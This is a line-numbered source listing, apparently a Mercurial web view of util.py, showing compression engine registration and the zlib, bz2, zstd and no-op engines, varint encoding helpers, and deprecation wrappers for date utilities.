3345 3366 # No external facing name declared.
3346 3367 if bundlename:
3347 3368 self._bundlenames[bundlename] = name
3348 3369
3349 3370 self._bundletypes[bundletype] = name
3350 3371
3351 3372 wiresupport = engine.wireprotosupport()
3352 3373 if wiresupport:
3353 3374 wiretype = wiresupport.name
3354 3375 if wiretype in self._wiretypes:
3355 3376 raise error.Abort(_('wire protocol compression %s already '
3356 3377 'registered by %s') %
3357 3378 (wiretype, self._wiretypes[wiretype]))
3358 3379
3359 3380 self._wiretypes[wiretype] = name
3360 3381
3361 3382 revlogheader = engine.revlogheader()
3362 3383 if revlogheader and revlogheader in self._revlogheaders:
3363 3384 raise error.Abort(_('revlog header %s already registered by %s') %
3364 3385 (revlogheader, self._revlogheaders[revlogheader]))
3365 3386
3366 3387 if revlogheader:
3367 3388 self._revlogheaders[revlogheader] = name
3368 3389
3369 3390 self._engines[name] = engine
3370 3391
3371 3392 @property
3372 3393 def supportedbundlenames(self):
3373 3394 return set(self._bundlenames.keys())
3374 3395
3375 3396 @property
3376 3397 def supportedbundletypes(self):
3377 3398 return set(self._bundletypes.keys())
3378 3399
3379 3400 def forbundlename(self, bundlename):
3380 3401 """Obtain a compression engine registered to a bundle name.
3381 3402
3382 3403 Will raise KeyError if the bundle type isn't registered.
3383 3404
3384 3405 Will abort if the engine is known but not available.
3385 3406 """
3386 3407 engine = self._engines[self._bundlenames[bundlename]]
3387 3408 if not engine.available():
3388 3409 raise error.Abort(_('compression engine %s could not be loaded') %
3389 3410 engine.name())
3390 3411 return engine
3391 3412
3392 3413 def forbundletype(self, bundletype):
3393 3414 """Obtain a compression engine registered to a bundle type.
3394 3415
3395 3416 Will raise KeyError if the bundle type isn't registered.
3396 3417
3397 3418 Will abort if the engine is known but not available.
3398 3419 """
3399 3420 engine = self._engines[self._bundletypes[bundletype]]
3400 3421 if not engine.available():
3401 3422 raise error.Abort(_('compression engine %s could not be loaded') %
3402 3423 engine.name())
3403 3424 return engine
3404 3425
3405 3426 def supportedwireengines(self, role, onlyavailable=True):
3406 3427 """Obtain compression engines that support the wire protocol.
3407 3428
3408 3429 Returns a list of engines in prioritized order, most desired first.
3409 3430
3410 3431 If ``onlyavailable`` is set, filter out engines that can't be
3411 3432 loaded.
3412 3433 """
3413 3434 assert role in (SERVERROLE, CLIENTROLE)
3414 3435
3415 3436 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3416 3437
3417 3438 engines = [self._engines[e] for e in self._wiretypes.values()]
3418 3439 if onlyavailable:
3419 3440 engines = [e for e in engines if e.available()]
3420 3441
3421 3442 def getkey(e):
3422 3443 # Sort first by priority, highest first. In case of tie, sort
3423 3444 # alphabetically. This is arbitrary, but ensures output is
3424 3445 # stable.
3425 3446 w = e.wireprotosupport()
3426 3447 return -1 * getattr(w, attr), w.name
3427 3448
3428 3449 return list(sorted(engines, key=getkey))
3429 3450
3430 3451 def forwiretype(self, wiretype):
3431 3452 engine = self._engines[self._wiretypes[wiretype]]
3432 3453 if not engine.available():
3433 3454 raise error.Abort(_('compression engine %s could not be loaded') %
3434 3455 engine.name())
3435 3456 return engine
3436 3457
3437 3458 def forrevlogheader(self, header):
3438 3459 """Obtain a compression engine registered to a revlog header.
3439 3460
3440 3461 Will raise KeyError if the revlog header value isn't registered.
3441 3462 """
3442 3463 return self._engines[self._revlogheaders[header]]
3443 3464
3444 3465 compengines = compressormanager()
3445 3466
3446 3467 class compressionengine(object):
3447 3468 """Base class for compression engines.
3448 3469
3449 3470 Compression engines must implement the interface defined by this class.
3450 3471 """
3451 3472 def name(self):
3452 3473 """Returns the name of the compression engine.
3453 3474
3454 3475 This is the key the engine is registered under.
3455 3476
3456 3477 This method must be implemented.
3457 3478 """
3458 3479 raise NotImplementedError()
3459 3480
3460 3481 def available(self):
3461 3482 """Whether the compression engine is available.
3462 3483
3463 3484 The intent of this method is to allow optional compression engines
3464 3485 that may not be available in all installations (such as engines relying
3465 3486 on C extensions that may not be present).
3466 3487 """
3467 3488 return True
3468 3489
3469 3490 def bundletype(self):
3470 3491 """Describes bundle identifiers for this engine.
3471 3492
3472 3493 If this compression engine isn't supported for bundles, returns None.
3473 3494
3474 3495 If this engine can be used for bundles, returns a 2-tuple of strings of
3475 3496 the user-facing "bundle spec" compression name and an internal
3476 3497 identifier used to denote the compression format within bundles. To
3477 3498 exclude the name from external usage, set the first element to ``None``.
3478 3499
3479 3500 If bundle compression is supported, the class must also implement
3480 3501 ``compressstream`` and `decompressorreader``.
3481 3502
3482 3503 The docstring of this method is used in the help system to tell users
3483 3504 about this engine.
3484 3505 """
3485 3506 return None
3486 3507
3487 3508 def wireprotosupport(self):
3488 3509 """Declare support for this compression format on the wire protocol.
3489 3510
3490 3511 If this compression engine isn't supported for compressing wire
3491 3512 protocol payloads, returns None.
3492 3513
3493 3514 Otherwise, returns ``compenginewireprotosupport`` with the following
3494 3515 fields:
3495 3516
3496 3517 * String format identifier
3497 3518 * Integer priority for the server
3498 3519 * Integer priority for the client
3499 3520
3500 3521 The integer priorities are used to order the advertisement of format
3501 3522 support by server and client. The highest integer is advertised
3502 3523 first. Integers with non-positive values aren't advertised.
3503 3524
3504 3525 The priority values are somewhat arbitrary and only used for default
3505 3526 ordering. The relative order can be changed via config options.
3506 3527
3507 3528 If wire protocol compression is supported, the class must also implement
3508 3529 ``compressstream`` and ``decompressorreader``.
3509 3530 """
3510 3531 return None
3511 3532
3512 3533 def revlogheader(self):
3513 3534 """Header added to revlog chunks that identifies this engine.
3514 3535
3515 3536 If this engine can be used to compress revlogs, this method should
3516 3537 return the bytes used to identify chunks compressed with this engine.
3517 3538 Else, the method should return ``None`` to indicate it does not
3518 3539 participate in revlog compression.
3519 3540 """
3520 3541 return None
3521 3542
3522 3543 def compressstream(self, it, opts=None):
3523 3544 """Compress an iterator of chunks.
3524 3545
3525 3546 The method receives an iterator (ideally a generator) of chunks of
3526 3547 bytes to be compressed. It returns an iterator (ideally a generator)
3527 3548 of bytes of chunks representing the compressed output.
3528 3549
3529 3550 Optionally accepts an argument defining how to perform compression.
3530 3551 Each engine treats this argument differently.
3531 3552 """
3532 3553 raise NotImplementedError()
3533 3554
3534 3555 def decompressorreader(self, fh):
3535 3556 """Perform decompression on a file object.
3536 3557
3537 3558 Argument is an object with a ``read(size)`` method that returns
3538 3559 compressed data. Return value is an object with a ``read(size)`` that
3539 3560 returns uncompressed data.
3540 3561 """
3541 3562 raise NotImplementedError()
3542 3563
3543 3564 def revlogcompressor(self, opts=None):
3544 3565 """Obtain an object that can be used to compress revlog entries.
3545 3566
3546 3567 The object has a ``compress(data)`` method that compresses binary
3547 3568 data. This method returns compressed binary data or ``None`` if
3548 3569 the data could not be compressed (too small, not compressible, etc).
3549 3570 The returned data should have a header uniquely identifying this
3550 3571 compression format so decompression can be routed to this engine.
3551 3572 This header should be identified by the ``revlogheader()`` return
3552 3573 value.
3553 3574
3554 3575 The object has a ``decompress(data)`` method that decompresses
3555 3576 data. The method will only be called if ``data`` begins with
3556 3577 ``revlogheader()``. The method should return the raw, uncompressed
3557 3578 data or raise a ``RevlogError``.
3558 3579
3559 3580 The object is reusable but is not thread safe.
3560 3581 """
3561 3582 raise NotImplementedError()
3562 3583
3563 3584 class _zlibengine(compressionengine):
3564 3585 def name(self):
3565 3586 return 'zlib'
3566 3587
3567 3588 def bundletype(self):
3568 3589 """zlib compression using the DEFLATE algorithm.
3569 3590
3570 3591 All Mercurial clients should support this format. The compression
3571 3592 algorithm strikes a reasonable balance between compression ratio
3572 3593 and size.
3573 3594 """
3574 3595 return 'gzip', 'GZ'
3575 3596
3576 3597 def wireprotosupport(self):
3577 3598 return compewireprotosupport('zlib', 20, 20)
3578 3599
3579 3600 def revlogheader(self):
3580 3601 return 'x'
3581 3602
3582 3603 def compressstream(self, it, opts=None):
3583 3604 opts = opts or {}
3584 3605
3585 3606 z = zlib.compressobj(opts.get('level', -1))
3586 3607 for chunk in it:
3587 3608 data = z.compress(chunk)
3588 3609 # Not all calls to compress emit data. It is cheaper to inspect
3589 3610 # here than to feed empty chunks through generator.
3590 3611 if data:
3591 3612 yield data
3592 3613
3593 3614 yield z.flush()
3594 3615
3595 3616 def decompressorreader(self, fh):
3596 3617 def gen():
3597 3618 d = zlib.decompressobj()
3598 3619 for chunk in filechunkiter(fh):
3599 3620 while chunk:
3600 3621 # Limit output size to limit memory.
3601 3622 yield d.decompress(chunk, 2 ** 18)
3602 3623 chunk = d.unconsumed_tail
3603 3624
3604 3625 return chunkbuffer(gen())
3605 3626
3606 3627 class zlibrevlogcompressor(object):
3607 3628 def compress(self, data):
3608 3629 insize = len(data)
3609 3630 # Caller handles empty input case.
3610 3631 assert insize > 0
3611 3632
3612 3633 if insize < 44:
3613 3634 return None
3614 3635
3615 3636 elif insize <= 1000000:
3616 3637 compressed = zlib.compress(data)
3617 3638 if len(compressed) < insize:
3618 3639 return compressed
3619 3640 return None
3620 3641
3621 3642 # zlib makes an internal copy of the input buffer, doubling
3622 3643 # memory usage for large inputs. So do streaming compression
3623 3644 # on large inputs.
3624 3645 else:
3625 3646 z = zlib.compressobj()
3626 3647 parts = []
3627 3648 pos = 0
3628 3649 while pos < insize:
3629 3650 pos2 = pos + 2**20
3630 3651 parts.append(z.compress(data[pos:pos2]))
3631 3652 pos = pos2
3632 3653 parts.append(z.flush())
3633 3654
3634 3655 if sum(map(len, parts)) < insize:
3635 3656 return ''.join(parts)
3636 3657 return None
3637 3658
3638 3659 def decompress(self, data):
3639 3660 try:
3640 3661 return zlib.decompress(data)
3641 3662 except zlib.error as e:
3642 3663 raise error.RevlogError(_('revlog decompress error: %s') %
3643 3664 forcebytestr(e))
3644 3665
3645 3666 def revlogcompressor(self, opts=None):
3646 3667 return self.zlibrevlogcompressor()
3647 3668
3648 3669 compengines.register(_zlibengine())
3649 3670
3650 3671 class _bz2engine(compressionengine):
3651 3672 def name(self):
3652 3673 return 'bz2'
3653 3674
3654 3675 def bundletype(self):
3655 3676 """An algorithm that produces smaller bundles than ``gzip``.
3656 3677
3657 3678 All Mercurial clients should support this format.
3658 3679
3659 3680 This engine will likely produce smaller bundles than ``gzip`` but
3660 3681 will be significantly slower, both during compression and
3661 3682 decompression.
3662 3683
3663 3684 If available, the ``zstd`` engine can yield similar or better
3664 3685 compression at much higher speeds.
3665 3686 """
3666 3687 return 'bzip2', 'BZ'
3667 3688
3668 3689 # We declare a protocol name but don't advertise by default because
3669 3690 # it is slow.
3670 3691 def wireprotosupport(self):
3671 3692 return compewireprotosupport('bzip2', 0, 0)
3672 3693
3673 3694 def compressstream(self, it, opts=None):
3674 3695 opts = opts or {}
3675 3696 z = bz2.BZ2Compressor(opts.get('level', 9))
3676 3697 for chunk in it:
3677 3698 data = z.compress(chunk)
3678 3699 if data:
3679 3700 yield data
3680 3701
3681 3702 yield z.flush()
3682 3703
3683 3704 def decompressorreader(self, fh):
3684 3705 def gen():
3685 3706 d = bz2.BZ2Decompressor()
3686 3707 for chunk in filechunkiter(fh):
3687 3708 yield d.decompress(chunk)
3688 3709
3689 3710 return chunkbuffer(gen())
3690 3711
3691 3712 compengines.register(_bz2engine())
3692 3713
3693 3714 class _truncatedbz2engine(compressionengine):
3694 3715 def name(self):
3695 3716 return 'bz2truncated'
3696 3717
3697 3718 def bundletype(self):
3698 3719 return None, '_truncatedBZ'
3699 3720
3700 3721 # We don't implement compressstream because it is hackily handled elsewhere.
3701 3722
3702 3723 def decompressorreader(self, fh):
3703 3724 def gen():
3704 3725 # The input stream doesn't have the 'BZ' header. So add it back.
3705 3726 d = bz2.BZ2Decompressor()
3706 3727 d.decompress('BZ')
3707 3728 for chunk in filechunkiter(fh):
3708 3729 yield d.decompress(chunk)
3709 3730
3710 3731 return chunkbuffer(gen())
3711 3732
3712 3733 compengines.register(_truncatedbz2engine())
3713 3734
3714 3735 class _noopengine(compressionengine):
3715 3736 def name(self):
3716 3737 return 'none'
3717 3738
3718 3739 def bundletype(self):
3719 3740 """No compression is performed.
3720 3741
3721 3742 Use this compression engine to explicitly disable compression.
3722 3743 """
3723 3744 return 'none', 'UN'
3724 3745
3725 3746 # Clients always support uncompressed payloads. Servers don't because
3726 3747 # unless you are on a fast network, uncompressed payloads can easily
3727 3748 # saturate your network pipe.
3728 3749 def wireprotosupport(self):
3729 3750 return compewireprotosupport('none', 0, 10)
3730 3751
3731 3752 # We don't implement revlogheader because it is handled specially
3732 3753 # in the revlog class.
3733 3754
3734 3755 def compressstream(self, it, opts=None):
3735 3756 return it
3736 3757
3737 3758 def decompressorreader(self, fh):
3738 3759 return fh
3739 3760
3740 3761 class nooprevlogcompressor(object):
3741 3762 def compress(self, data):
3742 3763 return None
3743 3764
3744 3765 def revlogcompressor(self, opts=None):
3745 3766 return self.nooprevlogcompressor()
3746 3767
3747 3768 compengines.register(_noopengine())
3748 3769
3749 3770 class _zstdengine(compressionengine):
3750 3771 def name(self):
3751 3772 return 'zstd'
3752 3773
3753 3774 @propertycache
3754 3775 def _module(self):
3755 3776 # Not all installs have the zstd module available. So defer importing
3756 3777 # until first access.
3757 3778 try:
3758 3779 from . import zstd
3759 3780 # Force delayed import.
3760 3781 zstd.__version__
3761 3782 return zstd
3762 3783 except ImportError:
3763 3784 return None
3764 3785
3765 3786 def available(self):
3766 3787 return bool(self._module)
3767 3788
3768 3789 def bundletype(self):
3769 3790 """A modern compression algorithm that is fast and highly flexible.
3770 3791
3771 3792 Only supported by Mercurial 4.1 and newer clients.
3772 3793
3773 3794 With the default settings, zstd compression is both faster and yields
3774 3795 better compression than ``gzip``. It also frequently yields better
3775 3796 compression than ``bzip2`` while operating at much higher speeds.
3776 3797
3777 3798 If this engine is available and backwards compatibility is not a
3778 3799 concern, it is likely the best available engine.
3779 3800 """
3780 3801 return 'zstd', 'ZS'
3781 3802
3782 3803 def wireprotosupport(self):
3783 3804 return compewireprotosupport('zstd', 50, 50)
3784 3805
3785 3806 def revlogheader(self):
3786 3807 return '\x28'
3787 3808
3788 3809 def compressstream(self, it, opts=None):
3789 3810 opts = opts or {}
3790 3811 # zstd level 3 is almost always significantly faster than zlib
3791 3812 # while providing no worse compression. It strikes a good balance
3792 3813 # between speed and compression.
3793 3814 level = opts.get('level', 3)
3794 3815
3795 3816 zstd = self._module
3796 3817 z = zstd.ZstdCompressor(level=level).compressobj()
3797 3818 for chunk in it:
3798 3819 data = z.compress(chunk)
3799 3820 if data:
3800 3821 yield data
3801 3822
3802 3823 yield z.flush()
3803 3824
3804 3825 def decompressorreader(self, fh):
3805 3826 zstd = self._module
3806 3827 dctx = zstd.ZstdDecompressor()
3807 3828 return chunkbuffer(dctx.read_from(fh))
3808 3829
3809 3830 class zstdrevlogcompressor(object):
3810 3831 def __init__(self, zstd, level=3):
3811 3832 # Writing the content size adds a few bytes to the output. However,
3812 3833 # it allows decompression to be more optimal since we can
3813 3834 # pre-allocate a buffer to hold the result.
3814 3835 self._cctx = zstd.ZstdCompressor(level=level,
3815 3836 write_content_size=True)
3816 3837 self._dctx = zstd.ZstdDecompressor()
3817 3838 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3818 3839 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3819 3840
3820 3841 def compress(self, data):
3821 3842 insize = len(data)
3822 3843 # Caller handles empty input case.
3823 3844 assert insize > 0
3824 3845
3825 3846 if insize < 50:
3826 3847 return None
3827 3848
3828 3849 elif insize <= 1000000:
3829 3850 compressed = self._cctx.compress(data)
3830 3851 if len(compressed) < insize:
3831 3852 return compressed
3832 3853 return None
3833 3854 else:
3834 3855 z = self._cctx.compressobj()
3835 3856 chunks = []
3836 3857 pos = 0
3837 3858 while pos < insize:
3838 3859 pos2 = pos + self._compinsize
3839 3860 chunk = z.compress(data[pos:pos2])
3840 3861 if chunk:
3841 3862 chunks.append(chunk)
3842 3863 pos = pos2
3843 3864 chunks.append(z.flush())
3844 3865
3845 3866 if sum(map(len, chunks)) < insize:
3846 3867 return ''.join(chunks)
3847 3868 return None
3848 3869
3849 3870 def decompress(self, data):
3850 3871 insize = len(data)
3851 3872
3852 3873 try:
3853 3874 # This was measured to be faster than other streaming
3854 3875 # decompressors.
3855 3876 dobj = self._dctx.decompressobj()
3856 3877 chunks = []
3857 3878 pos = 0
3858 3879 while pos < insize:
3859 3880 pos2 = pos + self._decompinsize
3860 3881 chunk = dobj.decompress(data[pos:pos2])
3861 3882 if chunk:
3862 3883 chunks.append(chunk)
3863 3884 pos = pos2
3864 3885 # Frame should be exhausted, so no finish() API.
3865 3886
3866 3887 return ''.join(chunks)
3867 3888 except Exception as e:
3868 3889 raise error.RevlogError(_('revlog decompress error: %s') %
3869 3890 forcebytestr(e))
3870 3891
3871 3892 def revlogcompressor(self, opts=None):
3872 3893 opts = opts or {}
3873 3894 return self.zstdrevlogcompressor(self._module,
3874 3895 level=opts.get('level', 3))
3875 3896
3876 3897 compengines.register(_zstdengine())
3877 3898
3878 3899 def bundlecompressiontopics():
3879 3900 """Obtains a list of available bundle compressions for use in help."""
3880 3901 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3881 3902 items = {}
3882 3903
3883 3904 # We need to format the docstring. So use a dummy object/type to hold it
3884 3905 # rather than mutating the original.
3885 3906 class docobject(object):
3886 3907 pass
3887 3908
3888 3909 for name in compengines:
3889 3910 engine = compengines[name]
3890 3911
3891 3912 if not engine.available():
3892 3913 continue
3893 3914
3894 3915 bt = engine.bundletype()
3895 3916 if not bt or not bt[0]:
3896 3917 continue
3897 3918
3898 3919 doc = pycompat.sysstr('``%s``\n %s') % (
3899 3920 bt[0], engine.bundletype.__doc__)
3900 3921
3901 3922 value = docobject()
3902 3923 value.__doc__ = doc
3903 3924 value._origdoc = engine.bundletype.__doc__
3904 3925 value._origfunc = engine.bundletype
3905 3926
3906 3927 items[bt[0]] = value
3907 3928
3908 3929 return items
3909 3930
3910 3931 i18nfunctions = bundlecompressiontopics().values()
3911 3932
3912 3933 # convenient shortcut
3913 3934 dst = debugstacktrace
3914 3935
3915 3936 def safename(f, tag, ctx, others=None):
3916 3937 """
3917 3938 Generate a name that it is safe to rename f to in the given context.
3918 3939
3919 3940 f: filename to rename
3920 3941 tag: a string tag that will be included in the new name
3921 3942 ctx: a context, in which the new name must not exist
3922 3943 others: a set of other filenames that the new name must not be in
3923 3944
3924 3945 Returns a file name of the form oldname~tag[~number] which does not exist
3925 3946 in the provided context and is not in the set of other names.
3926 3947 """
3927 3948 if others is None:
3928 3949 others = set()
3929 3950
3930 3951 fn = '%s~%s' % (f, tag)
3931 3952 if fn not in ctx and fn not in others:
3932 3953 return fn
3933 3954 for n in itertools.count(1):
3934 3955 fn = '%s~%s~%s' % (f, tag, n)
3935 3956 if fn not in ctx and fn not in others:
3936 3957 return fn
3937 3958
3938 3959 def readexactly(stream, n):
3939 3960 '''read n bytes from stream.read and abort if less was available'''
3940 3961 s = stream.read(n)
3941 3962 if len(s) < n:
3942 3963 raise error.Abort(_("stream ended unexpectedly"
3943 3964 " (got %d bytes, expected %d)")
3944 3965 % (len(s), n))
3945 3966 return s
3946 3967
3947 3968 def uvarintencode(value):
3948 3969 """Encode an unsigned integer value to a varint.
3949 3970
3950 3971 A varint is a variable length integer of 1 or more bytes. Each byte
3951 3972 except the last has the most significant bit set. The lower 7 bits of
3952 3973 each byte store the 2's complement representation, least significant group
3953 3974 first.
3954 3975
3955 3976 >>> uvarintencode(0)
3956 3977 '\\x00'
3957 3978 >>> uvarintencode(1)
3958 3979 '\\x01'
3959 3980 >>> uvarintencode(127)
3960 3981 '\\x7f'
3961 3982 >>> uvarintencode(1337)
3962 3983 '\\xb9\\n'
3963 3984 >>> uvarintencode(65536)
3964 3985 '\\x80\\x80\\x04'
3965 3986 >>> uvarintencode(-1)
3966 3987 Traceback (most recent call last):
3967 3988 ...
3968 3989 ProgrammingError: negative value for uvarint: -1
3969 3990 """
3970 3991 if value < 0:
3971 3992 raise error.ProgrammingError('negative value for uvarint: %d'
3972 3993 % value)
3973 3994 bits = value & 0x7f
3974 3995 value >>= 7
3975 3996 bytes = []
3976 3997 while value:
3977 3998 bytes.append(pycompat.bytechr(0x80 | bits))
3978 3999 bits = value & 0x7f
3979 4000 value >>= 7
3980 4001 bytes.append(pycompat.bytechr(bits))
3981 4002
3982 4003 return ''.join(bytes)
3983 4004
3984 4005 def uvarintdecodestream(fh):
3985 4006 """Decode an unsigned variable length integer from a stream.
3986 4007
3987 4008 The passed argument is anything that has a ``.read(N)`` method.
3988 4009
3989 4010 >>> try:
3990 4011 ... from StringIO import StringIO as BytesIO
3991 4012 ... except ImportError:
3992 4013 ... from io import BytesIO
3993 4014 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3994 4015 0
3995 4016 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3996 4017 1
3997 4018 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3998 4019 127
3999 4020 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
4000 4021 1337
4001 4022 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
4002 4023 65536
4003 4024 >>> uvarintdecodestream(BytesIO(b'\\x80'))
4004 4025 Traceback (most recent call last):
4005 4026 ...
4006 4027 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
4007 4028 """
4008 4029 result = 0
4009 4030 shift = 0
4010 4031 while True:
4011 4032 byte = ord(readexactly(fh, 1))
4012 4033 result |= ((byte & 0x7f) << shift)
4013 4034 if not (byte & 0x80):
4014 4035 return result
4015 4036 shift += 7
4016 4037
4017 4038 ###
4018 4039 # Deprecation warnings for util.py splitting
4019 4040 ###
4020 4041
4021 4042 defaultdateformats = dateutil.defaultdateformats
4022 4043
4023 4044 extendeddateformats = dateutil.extendeddateformats
4024 4045
4025 4046 def makedate(*args, **kwargs):
4026 4047 msg = ("'util.makedate' is deprecated, "
4027 4048 "use 'utils.dateutil.makedate'")
4028 4049 nouideprecwarn(msg, "4.6")
4029 4050 return dateutil.makedate(*args, **kwargs)
4030 4051
4031 4052 def datestr(*args, **kwargs):
4032 4053 msg = ("'util.datestr' is deprecated, "
4033 4054 "use 'utils.dateutil.datestr'")
4034 4055 nouideprecwarn(msg, "4.6")
4035 4056 debugstacktrace()
4036 4057 return dateutil.datestr(*args, **kwargs)
4037 4058
4038 4059 def shortdate(*args, **kwargs):
4039 4060 msg = ("'util.shortdate' is deprecated, "
4040 4061 "use 'utils.dateutil.shortdate'")
4041 4062 nouideprecwarn(msg, "4.6")
4042 4063 return dateutil.shortdate(*args, **kwargs)
4043 4064
4044 4065 def parsetimezone(*args, **kwargs):
4045 4066 msg = ("'util.parsetimezone' is deprecated, "
4046 4067 "use 'utils.dateutil.parsetimezone'")
4047 4068 nouideprecwarn(msg, "4.6")
4048 4069 return dateutil.parsetimezone(*args, **kwargs)
4049 4070
4050 4071 def strdate(*args, **kwargs):
4051 4072 msg = ("'util.strdate' is deprecated, "
4052 4073 "use 'utils.dateutil.strdate'")
4053 4074 nouideprecwarn(msg, "4.6")
4054 4075 return dateutil.strdate(*args, **kwargs)
4055 4076
4056 4077 def parsedate(*args, **kwargs):
4057 4078 msg = ("'util.parsedate' is deprecated, "
4058 4079 "use 'utils.dateutil.parsedate'")
4059 4080 nouideprecwarn(msg, "4.6")
4060 4081 return dateutil.parsedate(*args, **kwargs)
4061 4082
4062 4083 def matchdate(*args, **kwargs):
4063 4084 msg = ("'util.matchdate' is deprecated, "
4064 4085 "use 'utils.dateutil.matchdate'")
4065 4086 nouideprecwarn(msg, "4.6")
4066 4087 return dateutil.matchdate(*args, **kwargs)
General Comments 0
You need to be logged in to leave comments. Login now